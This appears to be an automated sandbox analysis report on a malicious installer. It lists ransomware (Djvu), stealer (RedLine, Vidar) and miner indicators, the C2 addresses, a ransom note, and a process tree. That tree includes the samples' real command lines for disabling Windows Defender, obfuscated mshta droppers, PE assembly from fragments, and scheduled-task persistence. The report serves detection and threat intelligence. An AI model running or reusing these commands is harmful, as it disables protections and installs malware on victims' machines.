Resubmissions

05-10-2021 16:27

211005-tx24csaah9 10

04-10-2021 16:37

211004-t43cpsgfe7 10

04-10-2021 07:39

211004-jhgtrsfhf8 10

03-10-2021 18:09

211003-wryvvsffgk 10

02-10-2021 23:31

211002-3hwsgaehhl 10

02-10-2021 06:10

211002-gxfh5sdgg7 10

01-10-2021 13:44

211001-q16deabhek 10

Analysis

  • max time kernel
    1098s
  • max time network
    1788s
  • platform
    windows7_x64
  • resource
    win7-de-20210920
  • submitted
    04-10-2021 16:37

General

  • Target

    setup_x86_x64_install.exe

  • Size

    6.4MB

  • MD5

    c6e46aa3d6424b03e0a4ccb193d3eade

  • SHA1

    c8b49055743fa7b4d6a982aea26efb627bb1f2e1

  • SHA256

    5e2bf564a4f985a7482d505def1ec79c92566bf7eda4724811ee29b9c4a66156

  • SHA512

    06e0c7d8012d4dbf1e6ccb7049c16d3041eb792261cc9910115c8663a45272c90cbce0ccd51875b8cd465b8f5a5c9f69164cc665b60787884ac42aec3aa7d32e

Malware Config

Extracted

Path

C:\_readme.txt

Family

djvu

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-1JwFK5rT39 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: supporthelp@airmail.cc Your personal ID: 0336gSd743dEy1gd1zw5QaTuD9AdJnQXoohKZidIKAiW6h35Dxs
Emails

manager@mailtemp.ch

supporthelp@airmail.cc

URLs

https://we.tl/t-1JwFK5rT39

Extracted

Family

redline

Botnet

jamesfuck

C2

65.108.20.195:6774

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

vidar

Version

41.1

Botnet

903

C2

https://mas.to/@bardak1ho

Attributes
  • profile_id

    903

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 12 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 11 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks BIOS information in registry 2 TTPs 13 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 22 IoCs
  • Drops file in Windows directory 34 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 7 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 44 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 24 IoCs
  • Modifies system certificate store 2 TTPs 20 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 9 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 18 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1124
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1116
      • C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
            PID:1572
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              5⤵
                PID:1636
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Fri1034cd265b5e0adcd.exe
              4⤵
              • Loads dropped DLL
              PID:1992
              • C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri1034cd265b5e0adcd.exe
                Fri1034cd265b5e0adcd.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1956
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri1034cd265b5e0adcd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri1034cd265b5e0adcd.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )
                  6⤵
                    PID:1108
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri1034cd265b5e0adcd.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri1034cd265b5e0adcd.exe" ) do taskkill -F -Im "%~nXU"
                      7⤵
                      • Loads dropped DLL
                      PID:2080
                      • C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
                        SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
                        8⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:2144
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )
                          9⤵
                            PID:2224
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
                              10⤵
                                PID:2500
                            • C:\Windows\SysWOW64\mshta.exe
                              "C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
                              9⤵
                                PID:2824
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
                                  10⤵
                                    PID:2888
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                      11⤵
                                        PID:2956
                                      • C:\Windows\SysWOW64\control.exe
                                        control .\FUEj5.QM
                                        11⤵
                                          PID:3008
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
                                            12⤵
                                              PID:2104
                                              • C:\Windows\system32\RunDll32.exe
                                                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
                                                13⤵
                                                  PID:3368
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
                                                    14⤵
                                                      PID:3396
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
                                                11⤵
                                                  PID:2968
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill -F -Im "Fri1034cd265b5e0adcd.exe"
                                            8⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2160
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Fri10584c049c7f.exe
                                    4⤵
                                    • Loads dropped DLL
                                    PID:1344
                                    • C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10584c049c7f.exe
                                      Fri10584c049c7f.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      • Loads dropped DLL
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1700
                                      • C:\Users\Admin\Documents\Lfs16AJQBT5ak_PmVsl9h1tr.exe
                                        "C:\Users\Admin\Documents\Lfs16AJQBT5ak_PmVsl9h1tr.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2468
                                      • C:\Users\Admin\Documents\vSRpOLSbNRBbwtM7bgLJxpE0.exe
                                        "C:\Users\Admin\Documents\vSRpOLSbNRBbwtM7bgLJxpE0.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:2504
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\vSRpOLSbNRBbwtM7bgLJxpE0.exe"
                                          7⤵
                                            PID:4040
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /T 10 /NOBREAK
                                              8⤵
                                              • Delays execution with timeout.exe
                                              PID:3088
                                        • C:\Users\Admin\Documents\f7GKXS2oAwqMu_TMdPaBiB6K.exe
                                          "C:\Users\Admin\Documents\f7GKXS2oAwqMu_TMdPaBiB6K.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:2544
                                        • C:\Users\Admin\Documents\i7fLMpX7oGXSbEkFfE5R182r.exe
                                          "C:\Users\Admin\Documents\i7fLMpX7oGXSbEkFfE5R182r.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Loads dropped DLL
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Suspicious use of SetThreadContext
                                          PID:1020
                                        • C:\Users\Admin\Documents\61ha1Q1X9MrKyWfoKBs9cbCy.exe
                                          "C:\Users\Admin\Documents\61ha1Q1X9MrKyWfoKBs9cbCy.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:992
                                        • C:\Users\Admin\Documents\YFlRUZXPU_LZvu6wZuScTno8.exe
                                          "C:\Users\Admin\Documents\YFlRUZXPU_LZvu6wZuScTno8.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:1540
                                        • C:\Users\Admin\Documents\Qjyc7EC86PyVdSLUUAM2kzDS.exe
                                          "C:\Users\Admin\Documents\Qjyc7EC86PyVdSLUUAM2kzDS.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          PID:2260
                                          • C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe
                                            "C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            PID:1568
                                            • C:\Users\Admin\Documents\OoiihxGR6ud7fuP0h2pXZnq_.exe
                                              "C:\Users\Admin\Documents\OoiihxGR6ud7fuP0h2pXZnq_.exe"
                                              8⤵
                                              • Executes dropped EXE
                                              PID:2516
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 612
                                              8⤵
                                              • Program crash
                                              • Suspicious behavior: GetForegroundWindowSpam
                                              PID:2256
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                            7⤵
                                            • Creates scheduled task(s)
                                            PID:3488
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                            7⤵
                                            • Creates scheduled task(s)
                                            PID:2036
                                        • C:\Users\Admin\Documents\y5ZV8LK3IHaS11HieAgnMl_s.exe
                                          "C:\Users\Admin\Documents\y5ZV8LK3IHaS11HieAgnMl_s.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:2072
                                        • C:\Users\Admin\Documents\B7rEf01TJHCnPi41f3gaGm1S.exe
                                          "C:\Users\Admin\Documents\B7rEf01TJHCnPi41f3gaGm1S.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:2756
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 868
                                            7⤵
                                            • Program crash
                                            • Suspicious behavior: GetForegroundWindowSpam
                                            PID:1688
                                        • C:\Users\Admin\Documents\gmJmpCzdJlKBZ6sE77joMVwc.exe
                                          "C:\Users\Admin\Documents\gmJmpCzdJlKBZ6sE77joMVwc.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2696
                                        • C:\Users\Admin\Documents\D3Lx0aVCMLQsC133qZwP_h9Y.exe
                                          "C:\Users\Admin\Documents\D3Lx0aVCMLQsC133qZwP_h9Y.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:2228
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 896
                                            7⤵
                                            • Program crash
                                            • Suspicious behavior: GetForegroundWindowSpam
                                            PID:2440
                                        • C:\Users\Admin\Documents\FZJ0uQGJzK34b6TeW89tx0YO.exe
                                          "C:\Users\Admin\Documents\FZJ0uQGJzK34b6TeW89tx0YO.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Checks processor information in registry
                                          PID:2704
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\FZJ0uQGJzK34b6TeW89tx0YO.exe" & exit
                                            7⤵
                                              PID:3572
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /t 5
                                                8⤵
                                                • Delays execution with timeout.exe
                                                PID:3040
                                          • C:\Users\Admin\Documents\1HIx9q4ulVrMCsDQ7uJVGqa0.exe
                                            "C:\Users\Admin\Documents\1HIx9q4ulVrMCsDQ7uJVGqa0.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:2688
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "1HIx9q4ulVrMCsDQ7uJVGqa0.exe" /f & erase "C:\Users\Admin\Documents\1HIx9q4ulVrMCsDQ7uJVGqa0.exe" & exit
                                              7⤵
                                                PID:3184
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /im "1HIx9q4ulVrMCsDQ7uJVGqa0.exe" /f
                                                  8⤵
                                                  • Kills process with taskkill
                                                  PID:3288
                                            • C:\Users\Admin\Documents\t6qM3sYG6rSK3hAyx8CJMvkI.exe
                                              "C:\Users\Admin\Documents\t6qM3sYG6rSK3hAyx8CJMvkI.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:2668
                                            • C:\Users\Admin\Documents\JVeNuMZxbjp5KpNoHrbLFJl8.exe
                                              "C:\Users\Admin\Documents\JVeNuMZxbjp5KpNoHrbLFJl8.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Drops file in Program Files directory
                                              PID:2308
                                              • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                                "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:920
                                              • C:\Program Files (x86)\Company\NewProduct\inst002.exe
                                                "C:\Program Files (x86)\Company\NewProduct\inst002.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:2352
                                              • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:2204
                                            • C:\Users\Admin\Documents\9F4Xktpzp1wzfwZd5KZ8KO98.exe
                                              "C:\Users\Admin\Documents\9F4Xktpzp1wzfwZd5KZ8KO98.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Checks BIOS information in registry
                                              • Checks whether UAC is enabled
                                              • Suspicious use of SetThreadContext
                                              PID:2488
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                7⤵
                                                  PID:3812
                                              • C:\Users\Admin\Documents\5Ht4JL0tbOHEn4OZeeUiT1uC.exe
                                                "C:\Users\Admin\Documents\5Ht4JL0tbOHEn4OZeeUiT1uC.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:2672
                                              • C:\Users\Admin\Documents\8Y2btnvkYZZYOVAmRmBwuiFZ.exe
                                                "C:\Users\Admin\Documents\8Y2btnvkYZZYOVAmRmBwuiFZ.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:2304
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 268
                                                  7⤵
                                                  • Program crash
                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                  PID:2884
                                              • C:\Users\Admin\Documents\WExDcTZQShsl7u0bAnfC9oJQ.exe
                                                "C:\Users\Admin\Documents\WExDcTZQShsl7u0bAnfC9oJQ.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:2780
                                                • C:\Users\Admin\AppData\Local\Temp\7zSE57E.tmp\Install.exe
                                                  .\Install.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:240
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS2BC0.tmp\Install.exe
                                                    .\Install.exe /S /site_id "394347"
                                                    8⤵
                                                    • Executes dropped EXE
                                                    • Checks BIOS information in registry
                                                    • Drops file in System32 directory
                                                    • Enumerates system info in registry
                                                    PID:3168
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                      9⤵
                                                        PID:3220
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                          10⤵
                                                            PID:3356
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                              11⤵
                                                                PID:3376
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                  12⤵
                                                                  • Drops file in System32 directory
                                                                  PID:3388
                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                    13⤵
                                                                      PID:3228
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                10⤵
                                                                  PID:3548
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                    11⤵
                                                                      PID:2772
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                        12⤵
                                                                        • Drops file in System32 directory
                                                                        PID:3820
                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                          13⤵
                                                                            PID:1252
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                      10⤵
                                                                        PID:2120
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                          11⤵
                                                                            PID:2184
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                              12⤵
                                                                              • Drops file in System32 directory
                                                                              PID:2140
                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                13⤵
                                                                                  PID:3436
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                            10⤵
                                                                              PID:3576
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                11⤵
                                                                                  PID:3376
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                    12⤵
                                                                                    • Drops file in System32 directory
                                                                                    PID:2816
                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                      13⤵
                                                                                        PID:3656
                                                                              • C:\Windows\SysWOW64\forfiles.exe
